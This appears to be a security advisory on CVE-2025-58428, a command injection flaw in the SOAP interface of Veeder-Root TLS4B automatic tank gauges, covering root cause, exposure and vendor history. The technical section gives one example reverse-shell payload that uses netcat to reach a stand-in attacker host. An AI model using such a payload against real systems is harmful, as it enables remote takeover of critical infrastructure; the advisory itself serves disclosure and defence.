Introduction
Attackers with valid credentials can remotely execute arbitrary system commands on Veeder-Root TLS4B Automatic Tank Gauge systems, potentially gaining full shell access and moving laterally within critical infrastructure networks. This vulnerability, tracked as CVE-2025-58428 and rated CVSS 9.9, exposes fuel monitoring and management systems in sectors such as energy, transportation, and defense to significant operational and security risks.
About Veeder-Root and TLS4B: Veeder-Root is a global leader in automatic tank gauging, with over a century in the industry and more than half a million systems deployed worldwide. The TLS4B is a flagship product used for real-time fuel inventory, leak detection, and compliance in gas stations, airports, and other critical sites. Its extensive deployment and integration with facility networks make vulnerabilities in this platform especially impactful.
Technical Information
CVE-2025-58428 is a command injection flaw in the SOAP-based web services interface of the Veeder-Root TLS4B. The vulnerability arises when the web services handler processes user-supplied input from SOAP requests and passes it to shell execution functions on the underlying Linux OS without proper sanitization. Special shell metacharacters such as semicolons (;), pipes (|), and ampersands (&) are not neutralized, allowing attackers to append arbitrary commands to the intended input.
The root cause matches CWE-77 (Improper Neutralization of Special Elements used in a Command). Attackers must possess valid credentials and network access to the SOAP interface. By crafting a malicious SOAP request, an attacker can inject payloads that break out of the intended command context. For example, an attacker could append ; nc attacker.com 4444 -e /bin/bash to gain a reverse shell, or use similar payloads for data exfiltration or system manipulation. The web services process may run with elevated privileges, increasing the risk of full system compromise.
No public code snippets or exploit scripts are available at this time. The vulnerability is confirmed to affect the SOAP interface and requires authentication, but the attack surface is significant due to the number of internet-exposed and poorly segmented ATG systems.
Affected Systems and Versions
- Product: Veeder-Root TLS4B Automatic Tank Gauge
- Vulnerable component: SOAP-based web services interface
- Underlying OS: Linux
- Specific affected versions: Not explicitly listed in public sources as of publication. All currently supported and internet-connected TLS4B systems with SOAP interface enabled should be considered at risk until official vendor confirmation.
- Vulnerable configuration: Systems with network-accessible SOAP interface and valid credentials
Vendor Security History
Veeder-Root has a history of security issues in its ATG product lines, including legacy protocol weaknesses and web interface vulnerabilities. Previous research (see Bitsight, CISA, and Dark Reading) has highlighted insecure default configurations, weak authentication, and lack of input validation in both legacy and modern ATG systems. The vendor has published network security reminders and configuration guides, but widespread internet exposure and legacy design choices have left many systems vulnerable. Patch response times have improved in recent years, but remediation is complicated by the operational constraints of critical infrastructure environments.
